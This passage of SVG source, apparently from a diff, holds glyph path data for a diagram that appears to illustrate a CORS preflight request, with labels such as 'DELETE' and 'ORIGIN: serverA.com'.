212.130932,64.5072918 213.209062,64.48125 C214.214275,64.48125 215.021559,64.8406214 215.630937,65.559375 C216.240315,66.2781286 216.545,67.2416606 216.545,68.45 C216.545,68.4968752 216.543698,68.5919264 216.541093,68.7351563 C216.538489,68.8783861 216.537187,68.9786455 216.537187,69.0359375 L210.57625,69.0359375 C210.586666,70.1349013 210.852289,71.0059864 211.373125,71.6492188 C211.893961,72.2924511 212.581454,72.6140625 213.435625,72.6140625 C213.992919,72.6140625 214.477289,72.548959 214.88875,72.41875 C215.30021,72.288541 215.729893,72.103647 216.177812,71.8640625 L216.341875,72.590625 C215.477287,73.1218777 214.500734,73.3875 213.412187,73.3875 Z M210.615312,68.2546875 L215.490312,68.2546875 C215.490312,67.3015577 215.284585,66.5710963 214.873125,66.0632813 C214.461664,65.5554662 213.896566,65.3015625 213.177812,65.3015625 C212.448642,65.3015625 211.860106,65.5723931 211.412187,66.1140625 C210.964268,66.6557319 210.698646,67.3692664 210.615312,68.2546875 Z M221.726562,73.3796875 C221.007808,73.3796875 220.481772,73.2169287 220.148437,72.8914063 C219.815102,72.5658838 219.648437,72.0359412 219.648437,71.3015625 L219.648437,65.3484375 L218.4375,65.3484375 L218.507812,64.7625 L219.664062,64.653125 L219.921875,62.6921875 L220.601562,62.6453125 L220.601562,64.6375 L223.101562,64.6375 L223.101562,65.3484375 L220.601562,65.3484375 L220.601562,71.0984375 C220.601562,71.7026072 220.700519,72.1075511 220.898437,72.3132813 C221.096355,72.5190114 221.44531,72.621875 221.945312,72.621875 C222.26823,72.621875 222.669268,72.5619798 223.148437,72.4421875 L223.1875,73.1921875 C222.557288,73.3171881 222.070314,73.3796875 221.726562,73.3796875 Z M225.42375,73.2 L225.42375,61.3171875 L226.3925,61.23125 L226.3925,65.54375 C226.3925,65.5854169 226.391197,65.6088541 226.388593,65.6140625 C226.385989,65.6192709 226.383385,65.6479164 226.380781,65.7 L226.369062,65.934375 C227.066982,64.9656202 228.066972,64.48125 229.369062,64.48125 C231.228446,64.48125 232.158125,65.6036346 232.158125,67.8484375 L232.158125,73.2 L231.197187,73.2 L231.197187,68.0359375 C231.197187,67.072391 231.048751,66.3757834 230.751875,65.9460938 C230.454998,65.5164041 229.931566,65.3015625 229.181562,65.3015625 C228.436767,65.3015625 227.816981,65.4981751 227.322187,65.8914063 C226.827393,66.2846374 226.522708,66.7911427 226.408125,67.4109375 C226.397708,67.6192719 226.3925,67.9291646 226.3925,68.340625 L226.3925,73.2 L225.42375,73.2 Z M238.777187,72.6140625 C239.40219,72.6140625 239.929529,72.4486996 240.359218,72.1179688 C240.788908,71.7872379 241.101405,71.3510444 241.296718,70.809375 C241.492032,70.2677056 241.589687,69.645316 241.589687,68.9421875 C241.589687,67.8380153 241.355314,66.9500034 240.886562,66.278125 C240.41781,65.6062466 239.704275,65.2703125 238.745937,65.2703125 C238.120934,65.2703125 237.588387,65.4382796 237.148281,65.7742188 C236.708174,66.1101579 236.386563,66.5502577 236.183437,67.0945313 C235.980311,67.6388048 235.87875,68.2624965 235.87875,68.965625 C235.87875,70.0333387 236.127445,70.9083299 236.624843,71.590625 C237.122242,72.2729201 237.839682,72.6140625 238.777187,72.6140625 Z M238.706875,73.3875 C237.930829,73.3875 237.247242,73.1921895 236.656093,72.8015625 C236.064945,72.4109355 235.614428,71.8809929 235.304531,71.2117188 C234.994633,70.5424446 234.839687,69.7859417 234.839687,68.9421875 C234.839687,68.3067677 234.92953,67.7169298 235.109218,67.1726563 C235.288907,66.6283827 235.545415,66.1570332 235.87875,65.7585938 C236.212085,65.3601543 236.626143,65.0476574 237.120937,64.8210938 C237.615731,64.5945301 238.165205,64.48125 238.769375,64.48125 C239.571462,64.48125 240.266767,64.6778626 240.855312,65.0710938 C241.443857,65.4643249 241.885258,65.9929654 242.179531,66.6570313 C242.473803,67.3210971 242.620937,68.0775999 242.620937,68.9265625 C242.620937,69.7807334 242.469897,70.5411425 242.167812,71.2078125 C241.865727,71.8744825 241.415211,72.4044251 240.81625,72.7976563 C240.217288,73.1908874 239.51417,73.3875 238.706875,73.3875 Z M248.591562,73.3796875 C247.450931,73.3796875 246.561617,72.9838581 245.923593,72.1921875 C245.285569,71.4005169 244.966562,70.3067778 244.966562,68.9109375 C244.966562,67.5984309 245.295986,66.5320354 245.954843,65.7117188 C246.613701,64.8914021 247.482182,64.48125 248.560312,64.48125 C249.091565,64.48125 249.622809,64.5958322 250.154062,64.825 C250.685315,65.0541678 251.088956,65.4109351 251.365,65.8953125 L251.365,61.3171875 L252.3025,61.23125 L252.3025,73.2 L251.497812,73.2 L251.357187,71.9109375 C251.060311,72.3953149 250.657971,72.7611967 250.150156,73.0085938 C249.642341,73.2559908 249.122815,73.3796875 248.591562,73.3796875 Z M248.568125,72.6140625 C249.052502,72.6140625 249.476977,72.5255217 249.841562,72.3484375 C250.206147,72.1713533 250.497811,71.9213558 250.716562,71.5984375 C250.935313,71.2755192 251.098072,70.9044292 251.204843,70.4851563 C251.311615,70.0658833 251.365,69.6010442 251.365,69.090625 C251.365,66.5437373 250.427509,65.2703125 248.5525,65.2703125 C248.109789,65.2703125 247.719168,65.3757802 247.380625,65.5867188 C247.042081,65.7976573 246.775157,66.0815086 246.579843,66.4382813 C246.38453,66.7950539 246.24,67.1830708 246.14625,67.6023438 C246.052499,68.0216167 246.005625,68.4630185 246.005625,68.9265625 C246.005625,69.3276062 246.03427,69.7039045 246.091562,70.0554688 C246.148854,70.407033 246.242603,70.7416651 246.372812,71.059375 C246.503021,71.3770849 246.664478,71.6492176 246.857187,71.8757813 C247.049896,72.1023449 247.292081,72.2820306 247.58375,72.4148438 C247.875418,72.5476569 248.203539,72.6140625 248.568125,72.6140625 Z M255.585625,73.4890625 L255.585625,71.840625 L256.984062,71.840625 L256.984062,73.4890625 L255.585625,73.4890625 Z M255.585625,65.9578125 L255.585625,64.325 L256.984062,64.325 L256.984062,65.9578125 L255.585625,65.9578125 Z M265.964374,72.3640625 L268.245624,72.3640625 C269.860216,72.3640625 271.090672,71.9513062 271.937031,71.1257813 C272.783389,70.3002563 273.206562,69.0697998 273.206562,67.434375 C273.206562,66.5385372 273.088074,65.7651074 272.851093,65.1140625 C272.614113,64.4630176 272.26646,63.9408874 271.808124,63.5476563 C271.349789,63.1544251 270.808128,62.8653655 270.183124,62.6804688 C269.558121,62.495572 268.836774,62.403125 268.019062,62.403125 L265.964374,62.403125 L265.964374,72.3640625 Z M264.964374,73.2 L264.964374,61.575 L268.112812,61.575 C269.060733,61.575 269.908381,61.686978 270.655781,61.9109375 C271.40318,62.134897 272.052913,62.4773414 272.604999,62.9382813 C273.157086,63.3992211 273.58156,64.0059858 273.878437,64.7585938 C274.175313,65.5112017 274.323749,66.3900991 274.323749,67.3953125 C274.323749,69.2963637 273.800317,70.7390576 272.753437,71.7234375 C271.706557,72.7078174 270.240426,73.2 268.354999,73.2 L264.964374,73.2 Z M277.497499,73.2 L277.497499,61.575 L283.974062,61.575 L283.934999,62.403125 L278.497499,62.403125 L278.497499,66.778125 L283.669374,66.778125 L283.669374,67.6296875 L278.497499,67.6296875 L278.497499,72.3640625 L284.106874,72.3640625 L284.020937,73.2 L277.497499,73.2 Z M287.249374,73.2 L287.249374,61.575 L288.257187,61.575 L288.257187,72.3171875 L293.483749,72.3171875 L293.436874,73.2 L287.249374,73.2 Z M295.876249,73.2 L295.876249,61.575 L302.352812,61.575 L302.313749,62.403125 L296.876249,62.403125 L296.876249,66.778125 L302.048124,66.778125 L302.048124,67.6296875 L296.876249,67.6296875 L296.876249,72.3640625 L302.485624,72.3640625 L302.399687,73.2 L295.876249,73.2 Z M307.924999,73.2 L307.924999,62.434375 L304.268749,62.434375 L304.268749,61.575 L312.596874,61.575 L312.596874,62.434375 L308.940624,62.434375 L308.940624,73.2 L307.924999,73.2 Z M314.911249,73.2 L314.911249,61.575 L321.387812,61.575 L321.348749,62.403125 L315.911249,62.403125 L315.911249,66.778125 L321.083124,66.778125 L321.083124,67.6296875 L315.911249,67.6296875 L315.911249,72.3640625 L321.520624,72.3640625 L321.434687,73.2 L314.911249,73.2 Z" id="Access-Control-Reque"></path>
+                </g>
+            </g>
+            <g id="Group" transform="translate(231.000000, 590.200000)" fill="#D3DDE2">
+                <path d="M2.421875,15.1640625 L4.703125,15.1640625 C6.31771641,15.1640625 7.54817285,14.7513062 8.39453125,13.9257812 C9.24088965,13.1002563 9.6640625,11.8697998 9.6640625,10.234375 C9.6640625,9.33853719 9.5455741,8.56510742 9.30859375,7.9140625 C9.0716134,7.26301758 8.72396062,6.74088738 8.265625,6.34765625 C7.80728937,5.95442512 7.26562812,5.66536551 6.640625,5.48046875 C6.01562187,5.29557199 5.29427492,5.203125 4.4765625,5.203125 L2.421875,5.203125 L2.421875,15.1640625 Z M1.421875,16 L1.421875,4.375 L4.5703125,4.375 C5.51823391,4.375 6.36588168,4.48697805 7.11328125,4.7109375 C7.86068082,4.93489695 8.51041391,5.27734145 9.0625,5.73828125 C9.61458609,6.19922105 10.039061,6.80598582 10.3359375,7.55859375 C10.632814,8.31120168 10.78125,9.19009914 10.78125,10.1953125 C10.78125,12.0963637 10.2578177,13.5390576 9.2109375,14.5234375 C8.16405727,15.5078174 6.69792609,16 4.8125,16 L1.421875,16 Z M13.955,16 L13.955,4.375 L20.4315625,4.375 L20.3925,5.203125 L14.955,5.203125 L14.955,9.578125 L20.126875,9.578125 L20.126875,10.4296875 L14.955,10.4296875 L14.955,15.1640625 L20.564375,15.1640625 L20.4784375,16 L13.955,16 Z M23.706875,16 L23.706875,4.375 L24.7146875,4.375 L24.7146875,15.1171875 L29.94125,15.1171875 L29.894375,16 L23.706875,16 Z M32.3337499,16 L32.3337499,4.375 L38.8103124,4.375 L38.7712499,5.203125 L33.3337499,5.203125 L33.3337499,9.578125 L38.5056249,9.578125 L38.5056249,10.4296875 L33.3337499,10.4296875 L33.3337499,15.1640625 L38.9431249,15.1640625 L38.8571874,16 L32.3337499,16 Z M44.3824999,16 L44.3824999,5.234375 L40.7262499,5.234375 L40.7262499,4.375 L49.0543749,4.375 L49.0543749,5.234375 L45.3981249,5.234375 L45.3981249,16 L44.3824999,16 Z M51.3687499,16 L51.3687499,4.375 L57.8453124,4.375 L57.8062499,5.203125 L52.3687499,5.203125 L52.3687499,9.578125 L57.5406249,9.578125 L57.5406249,10.4296875 L52.3687499,10.4296875 L52.3687499,15.1640625 L57.9781249,15.1640625 L57.8921874,16 L51.3687499,16 Z" id="DELETE"></path>
+                <path d="M6.3671875,46.359375 C7.32552563,46.359375 8.13150715,46.1406272 8.78515625,45.703125 C9.43880535,45.2656228 9.91796723,44.6653684 10.2226562,43.9023438 C10.5273453,43.1393191 10.6796875,42.2317761 10.6796875,41.1796875 C10.6796875,39.5338459 10.3151078,38.2604212 9.5859375,37.359375 C8.85676719,36.4583288 7.78646539,36.0078125 6.375,36.0078125 C4.95311789,36.0078125 3.87109746,36.4570268 3.12890625,37.3554688 C2.38671504,38.2539107 2.015625,39.5286376 2.015625,41.1796875 C2.015625,42.7786538 2.3841109,44.041662 3.12109375,44.96875 C3.8580766,45.895838 4.94009703,46.359375 6.3671875,46.359375 Z M6.3671875,47.1796875 C5.48176641,47.1796875 4.69140973,47.0325536 3.99609375,46.7382812 C3.30077777,46.4440089 2.73047098,46.0299506 2.28515625,45.4960938 C1.83984152,44.9622369 1.50130324,44.3307328 1.26953125,43.6015625 C1.03775926,42.8723922 0.921875,42.0677127 0.921875,41.1875 C0.921875,39.3437408 1.39713066,37.8802137 2.34765625,36.796875 C3.29818184,35.7135363 4.64061633,35.171875 6.375,35.171875 C8.07813352,35.171875 9.40624523,35.7174425 10.359375,36.8085938 C11.3125048,37.899745 11.7890625,39.36197 11.7890625,41.1953125 C11.7890625,42.0546918 11.6718762,42.8476526 11.4375,43.5742188 C11.2031238,44.3007849 10.8632835,44.932289 10.4179688,45.46875 C9.97265402,46.005211 9.4036493,46.4244777 8.7109375,46.7265625 C8.0182257,47.0286473 7.23698352,47.1796875 6.3671875,47.1796875 Z M14.9628125,47 L14.9628125,35.375 L18.2753125,35.375 C18.6971896,35.375 19.0630714,35.3828124 19.3729687,35.3984375 C19.6828661,35.4140626 19.9992692,35.4479164 20.3221875,35.5 C20.6451058,35.5520836 20.9198426,35.6210933 21.1464062,35.7070312 C21.3729699,35.7929692 21.5891135,35.9088534 21.7948437,36.0546875 C22.0005739,36.2005216 22.1659369,36.3763011 22.2909375,36.5820312 C22.4159381,36.7877614 22.5135934,37.0338527 22.5839062,37.3203125 C22.6542191,37.6067723 22.689375,37.9322898 22.689375,38.296875 C22.689375,39.0104202 22.5148976,39.6223933 22.1659375,40.1328125 C21.8169774,40.6432317 21.2831286,40.9895824 20.564375,41.171875 C20.8768765,41.8125032 21.1112492,42.2994775 21.2675,42.6328125 L23.17375,47 L22.0096875,47 L20.3690625,43.0234375 C20.2596869,42.7630195 20.0148977,42.2005252 19.6346875,41.3359375 C19.5305203,41.3515626 19.1451075,41.359375 18.4784375,41.359375 L15.9628125,41.3125 L15.9628125,47 L14.9628125,47 Z M18.908125,40.53125 C19.9445885,40.53125 20.6685396,40.3502622 21.08,39.9882812 C21.4914604,39.6263003 21.6971875,39.0677121 21.6971875,38.3125 C21.6971875,37.6354133 21.5109914,37.1158872 21.1385937,36.7539062 C20.766196,36.3919253 20.1320878,36.2109375 19.23625,36.2109375 L15.9628125,36.2109375 L15.9628125,40.5078125 C17.1867769,40.5234376 18.168538,40.53125 18.908125,40.53125 Z M26.2928125,47 L26.2928125,35.375 L27.2928125,35.375 L27.2928125,47 L26.2928125,47 Z M36.0446874,47.1796875 C35.3363506,47.1796875 34.6840133,47.0794281 34.0876562,46.8789062 C33.4912991,46.6783844 32.9769813,46.3984393 32.5446874,46.0390625 C32.1123936,45.6796857 31.7465119,45.2513046 31.4470312,44.7539062 C31.1475505,44.2565079 30.9235944,43.7096384 30.7751562,43.1132812 C30.626718,42.5169241 30.5524999,41.88542 30.5524999,41.21875 C30.5524999,40.0468691 30.7712478,39.0091191 31.2087499,38.1054688 C31.6462521,37.2018184 32.2985894,36.4869818 33.1657812,35.9609375 C34.032973,35.4348932 35.0603065,35.171875 36.2478124,35.171875 C37.5499023,35.171875 38.7061407,35.4713512 39.7165624,36.0703125 L39.2712499,36.875 C38.8441645,36.614582 38.3610964,36.4049487 37.8220312,36.2460938 C37.282966,36.0872388 36.7608358,36.0078125 36.2556249,36.0078125 C35.4952045,36.0078125 34.8168258,36.1432278 34.2204687,36.4140625 C33.6241116,36.6848972 33.1410435,37.0585914 32.7712499,37.5351562 C32.4014564,38.0117211 32.1215113,38.5598927 31.9314062,39.1796875 C31.7413011,39.7994823 31.6462499,40.4739547 31.6462499,41.203125 C31.6462499,41.9791705 31.7426032,42.6796844 31.9353124,43.3046875 C32.1280217,43.9296906 32.4170814,44.4700498 32.8024999,44.9257812 C33.1879185,45.3815127 33.6827053,45.7330717 34.2868749,45.9804688 C34.8910446,46.2278658 35.5889543,46.3515625 36.3806249,46.3515625 C37.1983374,46.3515625 38.09937,46.156252 39.0837499,45.765625 L39.0837499,42.046875 L36.2009374,42.046875 L36.2634374,41.1796875 L40.0134374,41.1796875 L40.0134374,46.3046875 C39.3780176,46.6328141 38.7621383,46.8606764 38.1657812,46.9882812 C37.5694241,47.1158861 36.8623999,47.1796875 36.0446874,47.1796875 Z M43.4449999,47 L43.4449999,35.375 L44.4449999,35.375 L44.4449999,47 L43.4449999,47 Z M48.2046874,47 L48.2046874,35.375 L49.3687499,35.375 L55.7671874,45.1796875 L56.1812499,45.75 C56.1447914,44.1458253 56.1265624,43.1484395 56.1265624,42.7578125 L56.1265624,35.375 L57.0718749,35.375 L57.0718749,47 L55.8843749,47 L49.5015624,37.2109375 L49.1031249,36.640625 C49.1447918,37.8125059 49.1656249,38.8229124 49.1656249,39.671875 L49.1656249,47 L48.2046874,47 Z M60.6284374,47.2890625 L60.6284374,45.640625 L62.0268749,45.640625 L62.0268749,47.2890625 L60.6284374,47.2890625 Z M60.6284374,39.7578125 L60.6284374,38.125 L62.0268749,38.125 L62.0268749,39.7578125 L60.6284374,39.7578125 Z M72.2337499,47.1953125 C71.6816638,47.1953125 71.1634398,47.1276048 70.6790624,46.9921875 C70.1946849,46.8567702 69.8118763,46.6953134 69.5306249,46.5078125 L69.6712499,45.6953125 C70.5306292,46.1432314 71.3535376,46.3671875 72.1399999,46.3671875 C73.5514653,46.3671875 74.2832288,45.8437552 74.3353124,44.796875 C74.3353124,44.3593728 74.1933867,44.0156262 73.9095311,43.765625 C73.6256755,43.5156238 73.0566708,43.2552097 72.2024999,42.984375 C71.754581,42.8281242 71.5071876,42.7421876 71.4603124,42.7265625 C70.121764,42.3203105 69.4472916,41.5989635 69.4368749,40.5625 C69.4368749,39.9635387 69.7011951,39.4335961 70.2298436,38.9726562 C70.7584921,38.5117164 71.4733287,38.28125 72.3743749,38.28125 C73.275421,38.28125 74.1217667,38.4583316 74.9134374,38.8125 L74.5853124,39.53125 C73.783225,39.2291652 73.0384408,39.078125 72.3509374,39.078125 C71.7467677,39.078125 71.271512,39.2135403 70.9251561,39.484375 C70.5788002,39.7552097 70.4056249,40.1197894 70.4056249,40.578125 C70.4056249,40.9635436 70.518905,41.2591136 70.7454686,41.4648438 C70.9720322,41.6705739 71.4212465,41.8671866 72.0931249,42.0546875 C72.1660419,42.0755209 72.3001551,42.1223955 72.4954686,42.1953125 C72.6907821,42.2682295 72.7988539,42.3072916 72.8196874,42.3125 C73.7207335,42.588543 74.3496335,42.9153627 74.7064061,43.2929688 C75.0631787,43.6705748 75.2415624,44.1848926 75.2415624,44.8359375 C75.2259373,45.5859413 74.9459922,46.1666646 74.4017186,46.578125 C73.8574451,46.9895854 73.134796,47.1953125 72.2337499,47.1953125 Z M81.4074998,47.1875 C80.2252023,47.1875 79.2864096,46.7916706 78.5910936,46 C77.8957776,45.2083294 77.5481248,44.1354234 77.5481248,42.78125 C77.5481248,41.4739518 77.8879652,40.40365 78.5676561,39.5703125 C79.247347,38.736975 80.1262445,38.3072918 81.2043748,38.28125 C82.2095882,38.28125 83.0168718,38.6406214 83.6262498,39.359375 C84.2356279,40.0781286 84.5403123,41.0416606 84.5403123,42.25 C84.5403123,42.2968752 84.5390103,42.3919264 84.5364061,42.5351562 C84.5338019,42.6783861 84.5324998,42.7786455 84.5324998,42.8359375 L78.5715623,42.8359375 C78.5819791,43.9349013 78.8476014,44.8059864 79.3684373,45.4492188 C79.8892733,46.0924511 80.5767664,46.4140625 81.4309373,46.4140625 C81.9882318,46.4140625 82.472602,46.348959 82.8840623,46.21875 C83.2955227,46.088541 83.7252059,45.903647 84.1731248,45.6640625 L84.3371873,46.390625 C83.4725997,46.9218777 82.496047,47.1875 81.4074998,47.1875 Z M78.6106248,42.0546875 L83.4856248,42.0546875 C83.4856248,41.1015577 83.2798977,40.3710963 82.8684373,39.8632812 C82.456977,39.3554662 81.8918784,39.1015625 81.1731248,39.1015625 C80.4439545,39.1015625 79.8554188,39.3723931 79.4074998,39.9140625 C78.9595809,40.4557319 78.6939586,41.1692664 78.6106248,42.0546875 Z M87.3234373,47 C87.3130206,41.9739332 87.3078123,39.1197951 87.3078123,38.4375 L88.1046873,38.4375 L88.1671873,40.125 C88.4744805,39.6145808 88.8651016,39.1979183 89.3390623,38.875 C89.813023,38.5520817 90.3078098,38.390625 90.8234373,38.390625 C91.0369801,38.390625 91.2661444,38.408854 91.5109373,38.4453125 L91.4406248,39.25 C91.2531239,39.2187498 91.0552092,39.203125 90.8468748,39.203125 C90.1229129,39.203125 89.514846,39.4882784 89.0226561,40.0585938 C88.5304661,40.6289091 88.2843748,41.3046836 88.2843748,42.0859375 L88.2843748,47 L87.3234373,47 Z M95.8487498,47 L92.5831248,38.4375 L93.6221873,38.4375 L95.6065623,43.8359375 C95.7107295,44.1744809 95.8344262,44.5351543 95.9776561,44.9179688 C96.1208859,45.3007832 96.2367702,45.5989573 96.3253123,45.8125 L96.4581248,46.1328125 C96.5570836,45.7994775 96.6859886,45.4414082 96.8448436,45.0585938 C97.0036985,44.6757793 97.1482283,44.2760437 97.2784373,43.859375 C97.419063,43.4114561 97.6742688,42.7356816 98.0440623,41.8320312 C98.4138558,40.9283809 98.8174976,39.7968818 99.2549998,38.4375 L100.294062,38.4375 L96.9737498,47 L95.8487498,47 Z M105.749062,47.1875 C104.566765,47.1875 103.627972,46.7916706 102.932656,46 C102.23734,45.2083294 101.889687,44.1354234 101.889687,42.78125 C101.889687,41.4739518 102.229528,40.40365 102.909219,39.5703125 C103.588909,38.736975 104.467807,38.3072918 105.545937,38.28125 C106.551151,38.28125 107.358434,38.6406214 107.967812,39.359375 C108.57719,40.0781286 108.881875,41.0416606 108.881875,42.25 C108.881875,42.2968752 108.880573,42.3919264 108.877969,42.5351562 C108.875364,42.6783861 108.874062,42.7786455 108.874062,42.8359375 L102.913125,42.8359375 C102.923542,43.9349013 103.189164,44.8059864 103.71,45.4492188 C104.230836,46.0924511 104.918329,46.4140625 105.7725,46.4140625 C106.329794,46.4140625 106.814164,46.348959 107.225625,46.21875 C107.637085,46.088541 108.066768,45.903647 108.514687,45.6640625 L108.67875,46.390625 C107.814162,46.9218777 106.837609,47.1875 105.749062,47.1875 Z M102.952187,42.0546875 L107.827187,42.0546875 C107.827187,41.1015577 107.62146,40.3710963 107.21,39.8632812 C106.798539,39.3554662 106.233441,39.1015625 105.514687,39.1015625 C104.785517,39.1015625 104.196981,39.3723931 103.749062,39.9140625 C103.301143,40.4557319 103.035521,41.1692664 102.952187,42.0546875 Z M111.665,47 C111.654583,41.9739332 111.649375,39.1197951 111.649375,38.4375 L112.44625,38.4375 L112.50875,40.125 C112.816043,39.6145808 113.206664,39.1979183 113.680625,38.875 C114.154585,38.5520817 114.649372,38.390625 115.165,38.390625 C115.378543,38.390625 115.607707,38.408854 115.8525,38.4453125 L115.782187,39.25 C115.594686,39.2187498 115.396772,39.203125 115.188437,39.203125 C114.464475,39.203125 113.856408,39.4882784 113.364219,40.0585938 C112.872029,40.6289091 112.625937,41.3046836 112.625937,42.0859375 L112.625937,47 L111.665,47 Z M116.96375,47 L121.502812,35.375 L122.46375,35.375 L126.83875,47 L125.8075,47 L124.323125,43.0546875 L119.502812,43.0546875 L117.955937,47 L116.96375,47 Z M119.885625,42.3203125 L123.96375,42.3203125 C122.791869,38.9557123 122.127813,36.9765655 121.971562,36.3828125 C121.909062,36.6119803 121.703335,37.2213492 121.354375,38.2109375 C121.005415,39.2005258 120.672085,40.1328081 120.354375,41.0078125 L119.885625,42.3203125 Z M129.98125,47.0625 C129.705207,47.0625 129.496875,46.9817716 129.35625,46.8203125 C129.215624,46.6588534 129.145312,46.4687511 129.145312,46.25 C129.145312,46.0364573 129.215624,45.8489591 129.35625,45.6875 C129.496875,45.5260409 129.705207,45.4453125 129.98125,45.4453125 C130.26771,45.4453125 130.481249,45.5260409 130.621875,45.6875 C130.7625,45.8489591 130.832812,46.0364573 130.832812,46.25 C130.832812,46.4687511 130.7625,46.6588534 130.621875,46.8203125 C130.481249,46.9817716 130.26771,47.0625 129.98125,47.0625 Z M137.303437,47.1875 C136.475308,47.1875 135.756565,46.984377 135.147187,46.578125 C134.537809,46.171873 134.084689,45.6419304 133.787812,44.9882812 C133.490936,44.3346321 133.3425,43.6067748 133.3425,42.8046875 C133.3425,42.1901011 133.431041,41.6119819 133.608125,41.0703125 C133.785209,40.5286431 134.036509,40.0494812 134.362031,39.6328125 C134.687553,39.2161438 135.10682,38.88672 135.619843,38.6445312 C136.132867,38.4023425 136.704476,38.28125 137.334687,38.28125 C137.746148,38.28125 138.1563,38.335937 138.565156,38.4453125 C138.974012,38.554688 139.277395,38.6848951 139.475312,38.8359375 L139.170625,39.5625 C138.634164,39.2604152 137.998753,39.109375 137.264375,39.109375 C136.373745,39.109375 135.668023,39.4466112 135.147187,40.1210938 C134.626351,40.7955763 134.365937,41.6900986 134.365937,42.8046875 C134.365937,43.8724012 134.625049,44.7356738 135.143281,45.3945312 C135.661513,46.0533887 136.368537,46.3828125 137.264375,46.3828125 C137.889378,46.3828125 138.561246,46.2265641 139.28,45.9140625 L139.428437,46.609375 C139.183644,46.7916676 138.865939,46.9335932 138.475312,47.0351562 C138.084685,47.1367193 137.694064,47.1875 137.303437,47.1875 Z M145.617812,46.4140625 C146.242815,46.4140625 146.770154,46.2486996 147.199843,45.9179688 C147.629533,45.5872379 147.94203,45.1510444 148.137343,44.609375 C148.332657,44.0677056 148.430312,43.445316 148.430312,42.7421875 C148.430312,41.6380153 148.19594,40.7500034 147.727187,40.078125 C147.258435,39.4062466 146.5449,39.0703125 145.586562,39.0703125 C144.961559,39.0703125 144.429012,39.2382796 143.988906,39.5742188 C143.5488,39.9101579 143.227188,40.3502577 143.024062,40.8945312 C142.820936,41.4388048 142.719375,42.0624965 142.719375,42.765625 C142.719375,43.8333387 142.96807,44.7083299 143.465468,45.390625 C143.962867,46.0729201 144.680308,46.4140625 145.617812,46.4140625 Z M145.5475,47.1875 C144.771454,47.1875 144.087867,46.9921895 143.496718,46.6015625 C142.90557,46.2109355 142.455053,45.6809929 142.145156,45.0117188 C141.835259,44.3424446 141.680312,43.5859417 141.680312,42.7421875 C141.680312,42.1067677 141.770155,41.5169298 141.949843,40.9726562 C142.129532,40.4283827 142.38604,39.9570332 142.719375,39.5585938 C143.05271,39.1601543 143.466768,38.8476574 143.961562,38.6210938 C144.456356,38.3945301 145.00583,38.28125 145.61,38.28125 C146.412087,38.28125 147.107393,38.4778626 147.695937,38.8710938 C148.284482,39.2643249 148.725884,39.7929654 149.020156,40.4570312 C149.314428,41.1210971 149.461562,41.8775999 149.461562,42.7265625 C149.461562,43.5807334 149.310522,44.3411425 149.008437,45.0078125 C148.706352,45.6744825 148.255836,46.2044251 147.656875,46.5976562 C147.057913,46.9908874 146.354795,47.1875 145.5475,47.1875 Z M152.22125,47 C152.205625,41.8228908 152.197812,38.9687527 152.197812,38.4375 L153.041562,38.4375 L153.166562,39.75 C153.416563,39.3229145 153.790258,38.9713555 154.287656,38.6953125 C154.785054,38.4192695 155.312393,38.28125 155.869687,38.28125 C157.239486,38.28125 158.098852,38.8203071 158.447812,39.8984375 C159.05719,38.8203071 160.018118,38.28125 161.330625,38.28125 C162.268129,38.28125 162.956925,38.5481744 163.397031,39.0820312 C163.837137,39.6158881 164.057187,40.411453 164.057187,41.46875 L164.057187,47 L163.088437,47 L163.088437,42.8125 C163.088437,42.4166647 163.083229,42.0859388 163.072812,41.8203125 C163.062395,41.5546862 163.037656,41.2656266 162.998593,40.953125 C162.959531,40.6406234 162.899636,40.3854177 162.818906,40.1875 C162.738176,39.9895823 162.632709,39.8020842 162.5025,39.625 C162.372291,39.4479158 162.205626,39.3177088 162.0025,39.234375 C161.799374,39.1510412 161.559793,39.109375 161.28375,39.109375 C160.627496,39.109375 160.071512,39.3033835 159.615781,39.6914062 C159.16005,40.079429 158.843646,40.6249965 158.666562,41.328125 C158.676979,41.8593777 158.69,42.2708319 158.705625,42.5625 L158.705625,47 L157.744687,47 L157.744687,42.640625 C157.744687,42.1979145 157.731666,41.8138037 157.705625,41.4882812 C157.679583,41.1627588 157.6275,40.8437516 157.549375,40.53125 C157.471249,40.2187484 157.365782,39.9635427 157.232968,39.765625 C157.100155,39.5677073 156.923074,39.4088548 156.701718,39.2890625 C156.480363,39.1692702 156.216043,39.109375 155.90875,39.109375 C155.200413,39.109375 154.607971,39.2981752 154.131406,39.6757812 C153.654841,40.0533873 153.34625,40.5677051 153.205625,41.21875 C153.195208,41.4322927 153.19,41.7369772 153.19,42.1328125 L153.19,47 L152.22125,47 Z" id="ORIGIN:-serverA.com"></path>
+                <path d="M0.046875,76 L4.5859375,64.375 L5.546875,64.375 L9.921875,76 L8.890625,76 L7.40625,72.0546875 L2.5859375,72.0546875 L1.0390625,76 L0.046875,76 Z M2.96875,71.3203125 L7.046875,71.3203125 C5.87499414,67.9557123 5.21093828,65.9765655 5.0546875,65.3828125 C4.99218719,65.6119803 4.78646008,66.2213492 4.4375,67.2109375 C4.08853992,68.2005258 3.75520992,69.1328081 3.4375,70.0078125 L2.96875,71.3203125 Z M15.5175,76.1875 C14.6893708,76.1875 13.970628,75.984377 13.36125,75.578125 C12.7518719,75.171873 12.2987515,74.6419304 12.001875,73.9882812 C11.7049985,73.3346321 11.5565625,72.6067748 11.5565625,71.8046875 C11.5565625,71.1901011 11.6451033,70.6119819 11.8221875,70.0703125 C11.9992717,69.5286431 12.2505713,69.0494812 12.5760937,68.6328125 C12.9016162,68.2161438 13.3208828,67.88672 13.8339062,67.6445312 C14.3469296,67.4023425 14.9185385,67.28125 15.54875,67.28125 C15.9602104,67.28125 16.3703625,67.335937 16.7792187,67.4453125 C17.1880749,67.554688 17.4914573,67.6848951 17.689375,67.8359375 L17.3846875,68.5625 C16.8482265,68.2604152 16.2128162,68.109375 15.4784375,68.109375 C14.587808,68.109375 13.8820859,68.4466112 13.36125,69.1210938 C12.840414,69.7955763 12.58,70.6900986 12.58,71.8046875 C12.58,72.8724012 12.839112,73.7356738 13.3573437,74.3945312 C13.8755755,75.0533887 14.5825997,75.3828125 15.4784375,75.3828125 C16.1034406,75.3828125 16.7753089,75.2265641 17.4940625,74.9140625 L17.6425,75.609375 C17.3977071,75.7916676 17.0800019,75.9335932 16.689375,76.0351562 C16.298748,76.1367193 15.9081269,76.1875 15.5175,76.1875 Z M23.7615625,76.1875 C22.9334333,76.1875 22.2146905,75.984377 21.6053125,75.578125 C20.9959344,75.171873 20.542814,74.6419304 20.2459375,73.9882812 C19.949061,73.3346321 19.800625,72.6067748 19.800625,71.8046875 C19.800625,71.1901011 19.8891657,70.6119819 20.06625,70.0703125 